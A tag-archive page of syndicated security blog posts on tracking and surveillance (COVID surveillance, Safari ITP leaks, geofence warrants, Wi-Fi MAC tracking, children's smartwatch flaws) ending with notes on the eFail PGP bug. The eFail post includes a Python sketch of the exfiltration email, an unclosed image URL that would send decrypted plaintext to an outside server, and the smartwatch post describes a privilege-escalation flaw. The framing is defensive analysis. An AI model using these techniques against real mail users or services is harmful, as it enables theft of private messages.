Tag Archives: tracking

Privacy vs. Surveillance in the Age of COVID-19

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/03/privacy_vs_surv.html

The trade-offs are changing:

As countries around the world race to contain the pandemic, many are deploying digital surveillance tools as a means to exert social control, even turning security agency technologies on their own civilians. Health and law enforcement authorities are understandably eager to employ every tool at their disposal to try to hinder the virus — even as the surveillance efforts threaten to alter the precarious balance between public safety and personal privacy on a global scale.

Yet ratcheting up surveillance to combat the pandemic now could permanently open the doors to more invasive forms of snooping later.

I think the effects of COVID-19 will be more drastic than the effects of the terrorist attacks of 9/11: not only with respect to surveillance, but across many aspects of our society. And while many things that would never be acceptable during normal times are reasonable things to do right now, we need to make sure we can ratchet them back once the current pandemic is over.

Cindy Cohn at EFF wrote:

We know that this virus requires us to take steps that would be unthinkable in normal times. Staying inside, limiting public gatherings, and cooperating with medically needed attempts to track the virus are, when approached properly, reasonable and responsible things to do. But we must be as vigilant as we are thoughtful. We must be sure that measures taken in the name of responding to COVID-19 are, in the language of international human rights law, “necessary and proportionate” to the needs of society in fighting the virus. Above all, we must make sure that these measures end and that the data collected for these purposes is not re-purposed for either governmental or commercial ends.

I worry that in our haste and fear, we will fail to do any of that.

More from EFF.

Build a Raspberry Pi Zero W Amazon price tracker

Post Syndicated from Alex Bate original https://www.raspberrypi.org/blog/build-a-raspberry-pi-zero-w-amazon-price-tracker/

Have you ever missed out on a great deal on Amazon because you were completely unaware it existed? Are you interested in a specific item but waiting for it to go on sale? Here’s help: Devscover’s latest video shows you how to create an Amazon price tracker using Raspberry Pi Zero W and Python.

Build An Amazon Price Tracker With Python

Wayne from Devscover shows you how to code an Amazon Price Tracker with Python! Get started with your first Python project. Land a job at a big firm like Google, Facebook, Twitter, or even the less well known but equally exciting big retail organisations or Government, with Devscover tutorials and tips.

By following their video tutorial, you can set up a notification system on Raspberry Pi Zero W that emails you every time your chosen item’s price drops. Very nice.
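For a sense of what such a tracker involves, here is a minimal sketch of the core logic in Python. Everything specific here is an assumption: the price-parsing pattern, the placeholder SMTP host and addresses, and the target price are invented for illustration, and Devscover's actual tutorial may structure things differently (it scrapes the live product page, which this sketch deliberately leaves out).

```python
import re
import smtplib
from email.message import EmailMessage

TARGET_PRICE = 50.00  # illustrative threshold: alert at or below this price

def parse_price(text):
    """Pull a float out of a scraped price string like '$49.99'."""
    match = re.search(r"(\d+[.,]\d{2})", text)
    return float(match.group(1).replace(",", ".")) if match else None

def should_alert(current_price, target_price):
    """True when the scraped price has dropped to or below the target."""
    return current_price is not None and current_price <= target_price

def send_alert(price):
    """Email a price-drop notification (host and addresses are placeholders)."""
    msg = EmailMessage()
    msg["Subject"] = f"Price drop: now {price:.2f}"
    msg["From"] = "tracker@example.com"
    msg["To"] = "you@example.com"
    msg.set_content(f"Your watched item is now {price:.2f}.")
    with smtplib.SMTP("smtp.example.com") as server:
        server.send_message(msg)

# In the tutorial, the price text comes from scraping the Amazon product
# page on a schedule; here we feed in a sample string instead.
price = parse_price("$49.99")
if should_alert(price, TARGET_PRICE):
    print("price drop detected")  # a real run would call send_alert(price)
```

On a Raspberry Pi Zero W, a cron entry running a script like this every hour is all the scheduling needed.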

Devscover’s tutorial is so detailed that it seems a waste to try and summarise it here. So instead, why not make yourself a cup of tea and sit down with the video? It’s worth the time investment: if you follow the instructions, you’ll end up with a great piece of tech that’ll save you money!

Remember, if you like what you see, subscribe to the Devscover YouTube channel and give them a thumbs-up for making wonderful Raspberry Pi content!

Apple’s Tracking-Prevention Feature in Safari has a Privacy Bug

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/02/apples_tracking.html

Last month, engineers at Google disclosed a very curious privacy bug in Apple’s Safari web browser. Apple’s Intelligent Tracking Prevention, a feature designed to reduce user tracking, has vulnerabilities that themselves allow user tracking. Some details:

ITP detects and blocks tracking on the web. When you visit a few websites that happen to load the same third-party resource, ITP detects the domain hosting the resource as a potential tracker and from then on sanitizes web requests to that domain to limit tracking. Tracker domains are added to Safari’s internal, on-device ITP list. When future third-party requests are made to a domain on the ITP list, Safari will modify them to remove some information it believes may allow tracking the user (such as cookies).

[…]

The details should come as a surprise to everyone because it turns out that ITP could effectively be used for:

  • information leaks: detecting websites visited by the user (web browsing history hijacking, stealing a list of visited sites)
  • tracking the user with ITP, making the mechanism function like a cookie
  • fingerprinting the user: in ways similar to the HSTS fingerprint, but perhaps a bit better

I am sure we all agree that we would not expect a privacy feature meant to protect from tracking to effectively enable tracking, or to accidentally allow any website out there to steal its visitors’ web browsing history. But web architecture is complex, and the consequence is that this is exactly the case.
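As a rough illustration of the mechanism the excerpt describes (classification by cross-site prevalence, then request sanitization), here is a toy model. The threshold and data structures are invented for illustration; Apple's real heuristics are considerably more involved.

```python
from collections import defaultdict

PREVALENCE_THRESHOLD = 3  # illustrative; ITP's real classifier is richer

class TrackingPrevention:
    """Toy model of an ITP-style on-device tracker list."""

    def __init__(self):
        self.seen_on = defaultdict(set)  # third-party domain -> first-party sites
        self.tracker_list = set()        # the on-device ITP list

    def observe(self, first_party, third_party):
        """Record that a page on first_party loaded a resource from third_party."""
        self.seen_on[third_party].add(first_party)
        if len(self.seen_on[third_party]) >= PREVALENCE_THRESHOLD:
            self.tracker_list.add(third_party)

    def sanitize(self, request):
        """Strip tracking-capable state from requests to listed domains."""
        if request["domain"] in self.tracker_list:
            request = dict(request, cookies={})
        return request

itp = TrackingPrevention()
for site in ["news.example", "shop.example", "blog.example"]:
    itp.observe(site, "ads.example")

req = itp.sanitize({"domain": "ads.example", "cookies": {"id": "u123"}})
print(req["cookies"])  # cookies removed once the domain is classified
```

The irony the researchers exploited is that this on-device list is itself observable state: by probing whether requests to a given domain get sanitized, a site can learn (and even influence) the list's contents, turning the defense into a tracking and history-leak channel.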

Apple fixed this vulnerability in December, a month before Google published its findings.

If there’s any lesson here, it’s that privacy is hard — and that privacy engineering is even harder. It’s not that we shouldn’t try, but we should recognize that it’s easy to get it wrong.

Customer Tracking at Ralphs Grocery Store

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/01/customer_tracki.html

To comply with California’s new data privacy law, companies that collect information on consumers and users are forced to be more transparent about it. Sometimes the results are creepy. Here’s an article about Ralphs, a California supermarket chain owned by Kroger:

…the form proceeds to state that, as part of signing up for a rewards card, Ralphs “may collect” information such as “your level of education, type of employment, information about your health and information about insurance coverage you might carry.”

It says Ralphs may pry into “financial and payment information like your bank account, credit and debit card numbers, and your credit history.”

Wait, it gets even better.

Ralphs says it’s gathering “behavioral information” such as “your purchase and transaction histories” and “geolocation data,” which could mean the specific Ralphs aisles you browse or could mean the places you go when not shopping for groceries, thanks to the tracking capability of your smartphone.

Ralphs also reserves the right to go after “information about what you do online” and says it will make “inferences” about your interests “based on analysis of other information we have collected.”

Other information? This can include files from “consumer research firms” — read: professional data brokers — and “public databases,” such as property records and bankruptcy filings.

The reaction from John Votava, a Ralphs spokesman:

“I can understand why it raises eyebrows,” he said. “We may need to change the wording on the form.”

That’s the company’s solution. Don’t spy on people less, just change the wording so they don’t realize it.

More consumer protection laws will be required.

Google Receives Geofence Warrants

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/01/google_receives.html

Sometimes it’s hard to tell the corporate surveillance operations from the government ones:

Google reportedly has a database called Sensorvault in which it stores location data for millions of devices going back almost a decade.

The article is about geofence warrants, where the police go to companies like Google and ask for information about every device in a particular geographic area at a particular time. In 2013, we learned from Edward Snowden that the NSA does this worldwide. Its program is called CO-TRAVELLER. The NSA claims it stopped doing that in 2014 — probably it just stopped doing it in the US — but why should it bother when the government can just get the data from Google?

Both the New York Times and EFF have written about Sensorvault.

Wi-Fi Hotspot Tracking

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/10/wi-fi_hotspot_t.html

Free Wi-Fi hotspots can track your location, even if you don’t connect to them. This is because your phone or computer broadcasts a unique MAC address.

What distinguishes location-based marketing hotspot providers like Zenreach and Euclid is that the personal information you enter in the captive portal — like your email address, phone number, or social media profile — can be linked to your laptop or smartphone’s Media Access Control (MAC) address. That’s the unique alphanumeric ID that devices broadcast when Wi-Fi is switched on.

As Euclid explains in its privacy policy, “…if you bring your mobile device to your favorite clothing store today — that is a Location — and then a popular local restaurant a few days later — that is also a Location — we may know that a mobile device was in both locations based on seeing the same MAC Address.”

MAC addresses alone don’t contain identifying information besides the make of a device, such as whether a smartphone is an iPhone or a Samsung Galaxy. But as long as a device’s MAC address is linked to someone’s profile, and the device’s Wi-Fi is turned on, the movements of its owner can be followed by any hotspot from the same provider.

“After a user signs up, we associate their email address and other personal information with their device’s MAC address and with any location history we may previously have gathered (or later gather) for that device’s MAC address,” according to Zenreach’s privacy policy.
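Mechanically, the linking both policies describe is just a join on MAC address across venues. A hypothetical sketch (all MACs, venues, and emails here are invented):

```python
from collections import defaultdict

# Sightings a hotspot provider might log: (MAC address, venue, timestamp)
sightings = [
    ("aa:bb:cc:dd:ee:01", "clothing-store", "2019-10-01T12:00"),
    ("aa:bb:cc:dd:ee:01", "restaurant", "2019-10-03T19:30"),
]

# Identity collected once, via a captive-portal signup form
profiles = {"aa:bb:cc:dd:ee:01": "alice@example.com"}

def movement_history(profiles, sightings):
    """Join captive-portal identities onto passive MAC sightings.

    One signup is enough to link every past and future sighting of the
    same MAC address to a named person.
    """
    history = defaultdict(list)
    for mac, venue, ts in sightings:
        if mac in profiles:
            history[profiles[mac]].append((venue, ts))
    return dict(history)

print(movement_history(profiles, sightings))
```

Newer phones randomize the MAC address used while scanning, and some also randomize it per network when joining, which blunts this technique; a device that connects with its real MAC address remains fully linkable.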

The defense is to turn Wi-Fi off on your phone when you’re not using it.

EDITED TO ADD: Note that the article is from 2018. Not that I think anything is different today….

Russians Hack FBI Comms System

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/09/russians_hack_f.html

Yahoo News reported that the Russians have successfully targeted an FBI communications system:

American officials discovered that the Russians had dramatically improved their ability to decrypt certain types of secure communications and had successfully tracked devices used by elite FBI surveillance teams. Officials also feared that the Russians may have devised other ways to monitor U.S. intelligence communications, including hacking into computers not connected to the internet. Senior FBI and CIA officials briefed congressional leaders on these issues as part of a wide-ranging examination on Capitol Hill of U.S. counterintelligence vulnerabilities.

These compromises, the full gravity of which became clear to U.S. officials in 2012, gave Russian spies in American cities including Washington, New York and San Francisco key insights into the location of undercover FBI surveillance teams, and likely the actual substance of FBI communications, according to former officials. They provided the Russians opportunities to potentially shake off FBI surveillance and communicate with sensitive human sources, check on remote recording devices and even gather intelligence on their FBI pursuers, the former officials said.

It’s unclear whether the Russians were able to recover encrypted data or just perform traffic analysis. The Yahoo story implies the former; the NBC News story says otherwise. It’s hard to tell if the reporters truly understand the difference. We do know, from research Matt Blaze and others did almost ten years ago, that at least one FBI radio system was horribly insecure in practice — but not in a way that breaks the encryption. Its poor design just encourages users to turn off the encryption.

Modifying a Tesla to Become a Surveillance Platform

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/08/modifying_a_tes.html

From DefCon:

At the Defcon hacker conference today, security researcher Truman Kain debuted what he calls the Surveillance Detection Scout. The DIY computer fits into the middle console of a Tesla Model S or Model 3, plugs into its dashboard USB port, and turns the car’s built-in cameras — the same dash and rearview cameras providing a 360-degree view used for Tesla’s Autopilot and Sentry features — into a system that spots, tracks, and stores license plates and faces over time. The tool uses open source image recognition software to automatically put an alert on the Tesla’s display and the user’s phone if it repeatedly sees the same license plate. When the car is parked, it can track nearby faces to see which ones repeatedly appear. Kain says the intent is to offer a warning that someone might be preparing to steal the car, tamper with it, or break into the driver’s nearby home.

How Apple’s "Find My" Feature Works

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/06/how_apples_find.html

Matthew Green intelligently speculates about how Apple’s new “Find My” feature works.

If you haven’t already been inspired by the description above, let me phrase the question you ought to be asking: how is this system going to avoid being a massive privacy nightmare?

Let me count the concerns:

  • If your device is constantly emitting a BLE signal that uniquely identifies it, the whole world is going to have (yet another) way to track you. Marketers already use WiFi and Bluetooth MAC addresses to do this: Find My could create yet another tracking channel.
  • It also exposes the phones that are doing the tracking. These people are now going to be sending their current location to Apple (which they may or may not already be doing). Now they’ll also be potentially sharing this information with strangers who “lose” their devices. That could go badly.
  • Scammers might also run active attacks in which they fake the location of your device. While this seems unlikely, people will always surprise you.

The good news is that Apple claims that their system actually does provide strong privacy, and that it accomplishes this using clever cryptography. But as is typical, they’ve declined to give out the details of how they’re going to do it. Andy Greenberg talked me through an incomplete technical description that Apple provided to Wired, so that provides many hints. Unfortunately, what Apple provided still leaves huge gaps. It’s those gaps that I’m going to fill in with my best guess for what Apple is actually doing.
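To illustrate the kind of design that addresses Green's first concern, here is a sketch of rotating beacon identifiers derived from a per-device secret. This is a guess at the general shape, not Apple's actual scheme: Apple reportedly rotates public keys so that finder devices can also encrypt location reports to the owner, which the bare HMAC construction below cannot do.

```python
import hashlib
import hmac

DEVICE_SECRET = b"per-device secret provisioned at setup"  # illustrative

def beacon_id(secret, epoch):
    """Derive the identifier broadcast during a given time epoch.

    Only someone holding the secret can recompute (and thus recognize)
    these values; to everyone else, successive beacons look unrelated,
    so passive observers cannot link them into a track.
    """
    return hmac.new(secret, str(epoch).encode(), hashlib.sha256).hexdigest()[:16]

# The device rotates its advertised ID each epoch...
broadcasts = [beacon_id(DEVICE_SECRET, e) for e in range(3)]
assert len(set(broadcasts)) == 3  # each epoch's beacon is distinct

# ...while the owner, searching later, recomputes the same IDs to match
# against sighting reports uploaded by passing phones.
assert beacon_id(DEVICE_SECRET, 1) == broadcasts[1]
```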

On Surveillance in the Workplace

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/03/on_surveillance.html

Data & Society just published a report entitled “Workplace Monitoring & Surveillance”:

This explainer highlights four broad trends in employee monitoring and surveillance technologies:

  • Prediction and flagging tools that aim to predict characteristics or behaviors of employees or that are designed to identify or deter perceived rule-breaking or fraud. Touted as useful management tools, they can augment biased and discriminatory practices in workplace evaluations and segment workforces into risk categories based on patterns of behavior.
  • Biometric and health data of workers collected through tools like wearables, fitness tracking apps, and biometric timekeeping systems as a part of employer-provided health care programs, workplace wellness programs, and digital work-shift tracking tools. Tracking non-work-related activities and information, such as health data, may challenge the boundaries of worker privacy, open avenues for discrimination, and raise questions about consent and workers’ ability to opt out of tracking.
  • Remote monitoring and time-tracking used to manage workers and measure performance remotely. Companies may use these tools to decentralize and lower costs by hiring independent contractors, while still being able to exert control over them like traditional employees with the aid of remote monitoring tools. More advanced time-tracking can generate itemized records of on-the-job activities, which can be used to facilitate wage theft or allow employers to trim what counts as paid work time.
  • Gamification and algorithmic management of work activities through continuous data collection. Technology can take on management functions, such as sending workers automated “nudges” or adjusting performance benchmarks based on a worker’s real-time progress, while gamification renders work activities into competitive, game-like dynamics driven by performance metrics. However, these practices can create punitive work environments that place pressures on workers to meet demanding and shifting efficiency benchmarks.

In a blog post about this report, Cory Doctorow mentioned “the adoption curve for oppressive technology, which goes, ‘refugee, immigrant, prisoner, mental patient, children, welfare recipient, blue collar worker, white collar worker.'” I don’t agree with the ordering, but the sentiment is correct. These technologies are generally used first against people with diminished rights: prisoners, children, the mentally ill, and soldiers.

Friday Squid Blogging: A Tracking Device for Squid

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/02/friday_squid_bl_664.html

Really:

After years of “making do” with the available technology for his squid studies, Mooney created a versatile tag that allows him to research squid behavior. With the help of Kakani Katija, an engineer adapting the tag for jellyfish at California’s Monterey Bay Aquarium Research Institute (MBARI), Mooney’s team is creating a replicable system flexible enough to work across a range of soft-bodied marine animals. As Mooney and Katija refine the tags, they plan to produce an adaptable, open-source package that scientists researching other marine invertebrates can also use.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Security Flaws in Children’s Smart Watches

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/01/security_flaws_3.html

A year ago, the Norwegian Consumer Council published an excellent security analysis of children’s GPS-connected smart watches. The security was terrible. Not only could parents track the children, anyone else could also track the children.

A recent analysis checked if anything had improved after that torrent of bad press. Short answer: no.

Guess what: a train wreck. Anyone could access the entire database, including real-time child location, name, parents’ details, etc. Not just Gator watches either — the same back end covered multiple brands and tens of thousands of watches.

The Gator web backend was passing the user level as a parameter. Changing that value to another number gave super admin access throughout the platform. The system failed to validate that the user had the appropriate permission to take admin control!

This means that an attacker could get full access to all account information and all watch information. They could view any user of the system and any device on the system, including its location. They could manipulate everything and even change users’ emails/passwords to lock them out of their watch.

In fairness, upon our reporting of the vulnerability to them, Gator got it fixed in 48 hours.
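The bug described above is textbook broken access control: the server trusted a client-supplied privilege level. A sketch of the broken pattern next to the fix, with all names and the framework shape invented for illustration:

```python
# Hypothetical server-side handler; names and request format are invented.
users = {
    "parent-1": {"role": "user"},
    "staff-9": {"role": "admin"},
}

def get_account_vulnerable(request):
    """The broken pattern: the client tells the server its own level."""
    if request.get("user_level") == "admin":  # attacker just sends this
        return {"all_accounts": list(users)}
    return {"account": request["session_user"]}

def get_account_fixed(request):
    """The fix: derive the role from the authenticated session, server-side."""
    role = users[request["session_user"]]["role"]
    if role == "admin":
        return {"all_accounts": list(users)}
    return {"account": request["session_user"]}

# A regular user claiming admin:
forged = {"session_user": "parent-1", "user_level": "admin"}
print(get_account_vulnerable(forged))  # leaks every account
print(get_account_fixed(forged))       # ignores the forged parameter
```

The general rule: any privilege, role, or object-ownership decision must come from server-side state tied to the authenticated session, never from a parameter the client can edit.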

This is a lesson in the limits of naming and shaming: publishing vulnerabilities in an effort to get companies to improve their security. If a company is specifically named, it is likely to improve the specific vulnerability described. But that is unlikely to translate into improved security practices in the future. If an industry, or product category, is named generally, nothing is likely to happen. This is one of the reasons I am a proponent of regulation.

News article.

EDITED TO ADD (2/13): The EU has acted in a similar case.

New Ways to Track Internet Browsing

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/08/new_ways_to_tra.html

Interesting research on web tracking: “Who Left Open the Cookie Jar? A Comprehensive Evaluation of Third-Party Cookie Policies”:

Abstract: Nowadays, cookies are the most prominent mechanism to identify and authenticate users on the Internet. Although protected by the Same Origin Policy, popular browsers include cookies in all requests, even when these are cross-site. Unfortunately, these third-party cookies enable both cross-site attacks and third-party tracking. As a response to these nefarious consequences, various countermeasures have been developed in the form of browser extensions or even protection mechanisms that are built directly into the browser.

In this paper, we evaluate the effectiveness of these defense mechanisms by leveraging a framework that automatically evaluates the enforcement of the policies imposed to third-party requests. By applying our framework, which generates a comprehensive set of test cases covering various web mechanisms, we identify several flaws in the policy implementations of the 7 browsers and 46 browser extensions that were evaluated. We find that even built-in protection mechanisms can be circumvented by multiple novel techniques we discover. Based on these results, we argue that our proposed framework is a much-needed tool to detect bypasses and evaluate solutions to the exposed leaks. Finally, we analyze the origin of the identified bypass techniques, and find that these are due to a variety of implementation, configuration and design flaws.
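Among the built-in countermeasures the paper evaluates is the SameSite cookie attribute, which asks the browser not to attach a cookie to cross-site requests. Setting it is straightforward; here is an illustrative Set-Cookie header built with Python's standard library (cookie name and value are placeholders):

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["session"] = "abc123"
cookie["session"]["samesite"] = "Strict"  # never sent on cross-site requests
cookie["session"]["secure"] = True        # only sent over HTTPS
cookie["session"]["httponly"] = True      # not readable from JavaScript

# Render the attribute string a server would emit in a Set-Cookie header
header = cookie["session"].OutputString()
print(header)
```

The paper's finding is sobering precisely because even built-in mechanisms like this had enforcement gaps across the browsers and extensions tested, so such attributes are mitigations, not guarantees.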

The researchers discovered many new tracking techniques that work despite all existing anonymous browsing tools. These have not yet been seen in the wild, but that will change soon.

Three news articles. BoingBoing post.

Google Tracks its Users Even if They Opt-Out of Tracking

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/08/google_tracks_i.html

Google is tracking you, even if you turn off tracking:

Google says that will prevent the company from remembering where you’ve been. Google’s support page on the subject states: “You can turn off Location History at any time. With Location History off, the places you go are no longer stored.”

That isn’t true. Even with Location History paused, some Google apps automatically store time-stamped location data without asking.

For example, Google stores a snapshot of where you are when you merely open its Maps app. Automatic daily weather updates on Android phones pinpoint roughly where you are. And some searches that have nothing to do with location, like “chocolate chip cookies,” or “kids science kits,” pinpoint your precise latitude and longitude — accurate to the square foot — and save it to your Google account.

On the one hand, this isn’t surprising to technologists. Lots of applications use location data. On the other hand, it’s very surprising — and counterintuitive — to everyone else. And that’s why this is a problem.

I don’t think we should pick on Google too much, though. Google is a symptom of the bigger problem: surveillance capitalism in general. As long as surveillance is the business model of the Internet, things like this are inevitable.

BoingBoing story.

Good commentary.

Accessing Cell Phone Location Information

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/05/accessing_cell_.html

The New York Times is reporting about a company called Securus Technologies that gives police the ability to track cell phone locations without a warrant:

The service can find the whereabouts of almost any cellphone in the country within seconds. It does this by going through a system typically used by marketers and other companies to get location data from major cellphone carriers, including AT&T, Sprint, T-Mobile and Verizon, documents show.

Another article.

Boing Boing post.

Some notes on eFail

Post Syndicated from Robert Graham original https://blog.erratasec.com/2018/05/some-notes-on-efail.html

I’ve been busy trying to replicate the “eFail” PGP/SMIME bug. I thought I’d write up some notes.

PGP and S/MIME encrypt emails, so that eavesdroppers can’t read them. The bugs potentially allow eavesdroppers to take the encrypted emails they’ve captured and resend them to you, reformatted in a way that allows them to decrypt the messages.

Disable remote/external content in email

The most important defense is to disable “external” or “remote” content from being automatically loaded. This happens when HTML-formatted emails attempt to load images from remote websites. Sometimes this is legitimate: the sender wants to display images without filling up the email with them. But most of the time it’s illegitimate: senders hide images in the message in order to track you with unique IDs and cookies. For example, an email from politician Bernie Sanders to his supporters ended with exactly such a tracker: a long random number assigned to identify me, in an image whose width and height were set to one pixel, so you don’t even see it.

Such trackers are so pernicious that they are disabled by default in most email clients, including Thunderbird.

The problem is that as you read email messages, you often get frustrated by the error messages and missing content, so you keep adding exceptions.

The correct defense against this eFail bug is to make sure such remote content is disabled and that you have no exceptions, or at least, no HTTP exceptions. HTTPS exceptions (those using SSL) are okay as long as they aren’t to a website the attacker controls. Unencrypted exceptions, though, the hacker can eavesdrop on, so it doesn’t matter if they control the website the requests go to. If the attacker can eavesdrop on your emails, they can probably eavesdrop on your HTTP sessions as well.

Some have recommended disabling PGP and S/MIME completely. That’s probably overkill. As long as the attacker can’t use the “remote content” in emails, you are fine. Likewise, some have recommended disabling HTML completely. That’s not even an option in any email client I’ve used — you can disable sending HTML emails, but not receiving them. It’s sufficient to just disable grabbing remote content, not the rest of HTML email rendering.

I couldn’t replicate the direct exfiltration

There are two related bugs. One allows direct exfiltration, which appends the decrypted PGP email onto the end of an IMG tag (like one of those tracking tags), allowing the entire message to be decrypted.

An example of this is the following email. This is a standard HTML email message consisting of multiple parts. The trick is that the IMG tag in the first part starts the URL (blog.robertgraham.com/…) but doesn’t end it. It has the starting quote in front of the URL but no ending quote; the ending quote comes in the next chunk.

The next chunk isn’t HTML, though, it’s PGP. The PGP extension (in my case, Enigmail) will detect this and automatically decrypt it. In this case, it’s a previous email message of mine that the attacker captured by eavesdropping; the attacker pastes its contents into this new email message in order to get it decrypted.
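The message layout being described can be reconstructed schematically. This is not a working exploit, just the MIME shape of the direct-exfiltration trick, built here in Python with placeholder content:

```python
# Illustrative reconstruction of the "direct exfiltration" message layout:
# an HTML part whose IMG src attribute is never closed, followed by an
# inline PGP part pasted in by the attacker.
boundary = "BOUNDARY"
part1 = (
    "Content-Type: text/html\n\n"
    '<img src="http://blog.robertgraham.com/log?msg='  # quote never closed
)
part2 = (
    "Content-Type: text/plain\n\n"
    "-----BEGIN PGP MESSAGE-----\n"
    "(captured ciphertext pasted here by the attacker)\n"
    "-----END PGP MESSAGE-----\n"
)
message = (
    f'Content-Type: multipart/mixed; boundary="{boundary}"\n\n'
    f"--{boundary}\n{part1}\n"
    f"--{boundary}\n{part2}\n"
    f"--{boundary}--\n"
)
# If the client decrypts part 2 in place and renders the result as HTML,
# the plaintext lands inside the still-open src="..." attribute and is
# sent to the attacker's server when the "image" is fetched.
```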

What should happen at this point is that Thunderbird will generate a request (if “remote content” is enabled) to the blog.robertgraham.com server with the decrypted contents of the PGP email appended to it. But that’s not what happens.

I am indeed getting weird stuff in the URL (the bit after the GET /), but it’s not the PGP-decrypted message. Instead, what’s going on is that when Thunderbird puts together a “multipart/mixed” message, it adds its own HTML separator tags between each part, and that separator markup contains quote characters of its own.

That separator code is what you see in the above URL: everything up to its first quote character. That quote terminates the open quote in the URL from the first multipart section, causing the rest of the content to be ignored (as far as being sent as part of the URL).

So at least for the latest version of Thunderbird, you are accidentally safe, even if you have “remote content” enabled. Though this is only according to my tests; there may be a workaround that hackers could exploit.

STARTTLS

In the old days, email was sent plaintext over the wire so that it could be passively eavesdropped on. Nowadays, most providers send it via STARTTLS, which sorta encrypts it. Attackers can still intercept such email, but they have to do so actively, using man-in-the-middle attacks. Such active techniques can be detected if you are careful and look for them.

Some organizations don’t care. Apparently, some nation-states are just blocking all STARTTLS and forcing email to be sent unencrypted. Others do care. The NSA will passively sniff all the email it can in nations like Iraq, but it won’t actively intercept STARTTLS messages, for fear of getting caught.

The consequence is that it’s much less likely that somebody has been eavesdropping on you, passively grabbing all your PGP/SMIME emails. If you fear they have, you should look for it (e.g. send emails from Gmail and see if they are intercepted by sniffing the wire).
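Checking whether a given mail server even offers STARTTLS is easy with Python's standard library; whether that advertisement survives an active man-in-the-middle is exactly what a single clean connection can't tell you:

```python
import smtplib

def supports_starttls(host, port=25, timeout=10):
    """Connect to an SMTP server and report whether it advertises STARTTLS.

    Note: a downgrade attacker on the path can strip the STARTTLS
    advertisement, so a True result from a clean vantage point does not
    prove your own connections are protected.
    """
    with smtplib.SMTP(host, port, timeout=timeout) as server:
        code, _ = server.ehlo()
        return code == 250 and server.has_extn("starttls")

# Example (requires network access; any receiving MX host works):
# print(supports_starttls("aspmx.l.google.com"))
```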

You’ll know if you are getting hacked

If somebody attacks you using eFail, you’ll know. You’ll get an email message formatted this way, with multipart/mixed components, some with corrupt HTML, some encrypted via PGP. This means that for the most part, your risk is that you’ll be attacked only once — the hacker will only be able to get one message through and decrypt it before you notice that something is amiss. Though to be fair, they can probably include all the emails they want decrypted as attachments to the single email they send you, so the risk isn’t necessarily that you’ll only get one message decrypted.

As mentioned above, a lot of attackers (e.g. the NSA) won’t attack you if it’s so easy to get caught. Other attackers, though, like anonymous hackers, don’t care.

Somebody ought to write a plugin for Thunderbird to detect this.
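The detection such a plugin would need is not complicated; the heuristic follows directly from the description above. A sketch in Python (the quote-counting check is a crude stand-in for real HTML parsing):

```python
from email import message_from_string

def looks_like_efail(raw_message):
    """Flag multipart/mixed messages that mix an HTML part containing an
    unterminated quoted attribute with an inline PGP-encrypted part --
    the combination the attack depends on."""
    msg = message_from_string(raw_message)
    if msg.get_content_type() != "multipart/mixed":
        return False
    has_open_attr = has_pgp = False
    for part in msg.walk():
        body = part.get_payload(decode=False)
        if not isinstance(body, str):
            continue  # skip the multipart container itself
        if part.get_content_type() == "text/html" and body.count('"') % 2 == 1:
            has_open_attr = True  # odd number of quotes: attribute left open
        if "BEGIN PGP MESSAGE" in body:
            has_pgp = True
    return has_open_attr and has_pgp

# A minimal message with the suspicious shape (placeholder domain):
suspicious = (
    'Content-Type: multipart/mixed; boundary="b"\n\n'
    '--b\nContent-Type: text/html\n\n<img src="http://x.test/?p=\n'
    '--b\nContent-Type: text/plain\n\n-----BEGIN PGP MESSAGE-----\n'
    '-----END PGP MESSAGE-----\n--b--\n'
)
print(looks_like_efail(suspicious))
```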

Summary

  • It only works if attackers have already captured your emails (though that’s why you use PGP/SMIME in the first place: to guard against that).
  • It only works if you’ve enabled your email client to automatically grab external/remote content.
  • It seems not to be easily reproducible in all cases.
  • Instead of disabling PGP/SMIME, you should make sure your email client has remote/external content disabled — that’s a huge privacy violation even without this bug.

Notes: The default email client on the Mac enables remote content by default, which is bad.